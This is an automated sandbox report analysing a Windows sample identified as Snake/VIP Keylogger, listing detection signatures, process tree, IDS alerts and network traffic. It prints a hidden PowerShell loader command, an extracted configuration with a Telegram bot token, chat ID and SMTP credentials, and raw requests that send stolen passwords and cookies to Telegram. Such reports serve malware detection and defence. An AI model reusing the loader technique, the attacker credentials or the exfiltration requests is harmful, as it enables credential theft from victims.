Edit tour

Windows Analysis Report
Kb94RzMYNf.exe

Overview

General Information

Sample name:	Kb94RzMYNf.exe renamed because original name is a hash value
Original sample name:	f19b72b88ddbf56b257e6eef19c74e304beaf8f95d352741e400993472e721c9.exe
Analysis ID:	1588331
MD5:	ee18481e218cc9bc7a1628f5a7365776
SHA1:	57ea302c84a488de1e5a5bcc669e02c5d9a7a350
SHA256:	f19b72b88ddbf56b257e6eef19c74e304beaf8f95d352741e400993472e721c9
Tags:	exeGuLoaderuser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Early bird code injection technique detected

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Powershell drops PE file

Queues an APC in another process (thread injection)

Suspicious powershell command line found

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Msiexec Initiated Connection

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Suspicious Outbound SMTP Connections

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Kb94RzMYNf.exe (PID: 7916 cmdline: "C:\Users\user\Desktop\Kb94RzMYNf.exe" MD5: EE18481E218CC9BC7A1628F5A7365776)

powershell.exe (PID: 7988 cmdline: powershell.exe -windowstyle hidden "$afsmitnings=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Sunsetting.Spe';$Overbefolkede=$afsmitnings.SubString(6903,3);.$Overbefolkede($afsmitnings) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 5752 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot8101497037:AAEvNeES2X17rekW3womq6JjOwgZLJMqX1Y/sendMessage"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Username": "abraher@abraher.com", "Password": "General1", "Host": "mail.abraher.com", "Port": "587", "Token": "8101497037:AAEvNeES2X17rekW3womq6JjOwgZLJMqX1Y", "Chat_id": "7171338311", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.2599404721.0000000021DE7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000005.00000002.2599404721.0000000021DB4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.2599404721.0000000021CB1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: msiexec.exe PID: 5752	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: msiexec.exe PID: 5752	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security

Sigma Signatures

System Summary

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 142.250.184.238, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 5752, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49978

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7988, TargetFilename: C:\Users\user\AppData\Local\neoimpressionism\Kb94RzMYNf.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 82.194.91.193, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 5752, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49998

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$afsmitnings=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Sunsetting.Spe';$Overbefolkede=$afsmitnings.SubString(6903,3);.$Overbefolkede($afsmitnings) ", CommandLine: powershell.exe -windowstyle hidden "$afsmitnings=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Sunsetting.Spe';$Overbefolkede=$afsmitnings.SubString(6903,3);.$Overbefolkede($afsmitnings) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Kb94RzMYNf.exe", ParentImage: C:\Users\user\Desktop\Kb94RzMYNf.exe, ParentProcessId: 7916, ParentProcessName: Kb94RzMYNf.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$afsmitnings=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Sunsetting.Spe';$Overbefolkede=$afsmitnings.SubString(6903,3);.$Overbefolkede($afsmitnings) ", ProcessId: 7988, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T00:07:35.434003+0100	2803305	3	Unknown Traffic	192.168.2.10	49982	104.21.16.1	443	TCP
2025-01-11T00:07:36.802620+0100	2803305	3	Unknown Traffic	192.168.2.10	49984	104.21.16.1	443	TCP
2025-01-11T00:07:38.180425+0100	2803305	3	Unknown Traffic	192.168.2.10	49986	104.21.16.1	443	TCP
2025-01-11T00:07:39.500978+0100	2803305	3	Unknown Traffic	192.168.2.10	49988	104.21.16.1	443	TCP
2025-01-11T00:07:42.260446+0100	2803305	3	Unknown Traffic	192.168.2.10	49992	104.21.16.1	443	TCP
2025-01-11T00:07:44.901196+0100	2803305	3	Unknown Traffic	192.168.2.10	49996	104.21.16.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T00:07:33.507170+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49980	132.226.247.73	80	TCP
2025-01-11T00:07:34.866831+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49980	132.226.247.73	80	TCP
2025-01-11T00:07:36.194675+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49983	132.226.247.73	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T00:07:28.723789+0100	2803270	2	Potentially Bad Traffic	192.168.2.10	49978	142.250.184.238	443	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T00:08:03.369784+0100	1810008	1	Potentially Bad Traffic	192.168.2.10	49999	149.154.167.220	443	TCP
2025-01-11T00:08:13.281560+0100	1810008	1	Potentially Bad Traffic	192.168.2.10	50001	149.154.167.220	443	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T00:07:45.916213+0100	1810007	1	Potentially Bad Traffic	192.168.2.10	49997	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000005.00000002.2599404721.0000000021CB1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Username": "abraher@abraher.com", "Password": "General1", "Host": "mail.abraher.com", "Port": "587", "Token": "8101497037:AAEvNeES2X17rekW3womq6JjOwgZLJMqX1Y", "Chat_id": "7171338311", "Version": "4.4"}
Source: msiexec.exe.5752.5.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot8101497037:AAEvNeES2X17rekW3womq6JjOwgZLJMqX1Y/sendMessage"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\neoimpressionism\Kb94RzMYNf.exe

ReversingLabs: Detection: 52%

Multi AV Scanner detection for submitted file

Source: Kb94RzMYNf.exe	Virustotal: Detection: 72%			Perma Link
Source: Kb94RzMYNf.exe	ReversingLabs: Detection: 52%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\neoimpressionism\Kb94RzMYNf.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Kb94RzMYNf.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: Kb94RzMYNf.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.10:49981 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.10:49978 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.10:49979 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49997 version: TLS 1.2

Source: Kb94RzMYNf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Kb94RzMYNf.exe	Code function: 0_2_00405841 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405841
Source: C:\Users\user\Desktop\Kb94RzMYNf.exe	Code function: 0_2_004027FB FindFirstFileW,	0_2_004027FB
Source: C:\Users\user\Desktop\Kb94RzMYNf.exe	Code function: 0_2_00406393 FindFirstFileW,FindClose,	0_2_00406393

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	5_2_24500853
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	5_2_24500040
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2450FAB9h	5_2_2450F810
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2450D3A1h	5_2_2450D0F8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2450CF49h	5_2_2450CCA0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2450D7F9h	5_2_2450D550
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 24502C19h	5_2_24502968
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 245031E0h	5_2_2450310E
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 245031E0h	5_2_24502DC4
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 245031E0h	5_2_24502DC8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2450DC51h	5_2_2450D9A8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2450E501h	5_2_2450E258
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	5_2_24500673
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2450E0A9h	5_2_2450DE00
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2450E959h	5_2_2450E6B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2450F209h	5_2_2450EF60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2450EDB1h	5_2_2450EB08
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 24500D0Dh	5_2_24500B30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 24501697h	5_2_24500B30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2450F661h	5_2_2450F3B8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:50001 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.10:49997 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49999 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic

TCP traffic: 192.168.2.10:49998 -> 82.194.91.193:587

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:048707%0D%0ADate%20and%20Time:%2011/01/2025%20/%2006:42:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20048707%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot8101497037:AAEvNeES2X17rekW3womq6JjOwgZLJMqX1Y/sendDocument?chat_id=7171338311&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3282708daf7eHost: api.telegram.orgContent-Length: 580Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot8101497037:AAEvNeES2X17rekW3womq6JjOwgZLJMqX1Y/sendDocument?chat_id=7171338311&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd32ae06876375Host: api.telegram.orgContent-Length: 1277

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.16.1 104.21.16.1
Source: Joe Sandbox View	IP Address: 132.226.247.73 132.226.247.73

Source: Joe Sandbox View

ASN Name: ACENS_ASSpainHostinghousingandVPNservicesES ACENS_ASSpainHostinghousingandVPNservicesES

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49983 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49980 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.10:49978 -> 142.250.184.238:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49992 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49982 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49986 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49996 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49984 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49988 -> 104.21.16.1:443

Source: global traffic

TCP traffic: 192.168.2.10:49998 -> 82.194.91.193:587

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1XsJ-IQr2GvwbKOJx-mhThEFAjDp4uHiL HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1XsJ-IQr2GvwbKOJx-mhThEFAjDp4uHiL&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.10:49981 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1XsJ-IQr2GvwbKOJx-mhThEFAjDp4uHiL HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1XsJ-IQr2GvwbKOJx-mhThEFAjDp4uHiL&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:048707%0D%0ADate%20and%20Time:%2011/01/2025%20/%2006:42:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20048707%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: mail.abraher.com

Source: unknown

HTTP traffic detected: POST /bot8101497037:AAEvNeES2X17rekW3womq6JjOwgZLJMqX1Y/sendDocument?chat_id=7171338311&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3282708daf7eHost: api.telegram.orgContent-Length: 580Connection: Keep-Alive

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 10 Jan 2025 23:07:45 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: msiexec.exe, 00000005.00000002.2599404721.0000000021DE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: msiexec.exe, 00000005.00000002.2599404721.0000000021CB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: msiexec.exe, 00000005.00000002.2599404721.0000000021DE7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2599404721.0000000021DF7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://abraher.com
Source: msiexec.exe, 00000005.00000002.2599404721.0000000021CB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: msiexec.exe, 00000005.00000002.2599404721.0000000021DF7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
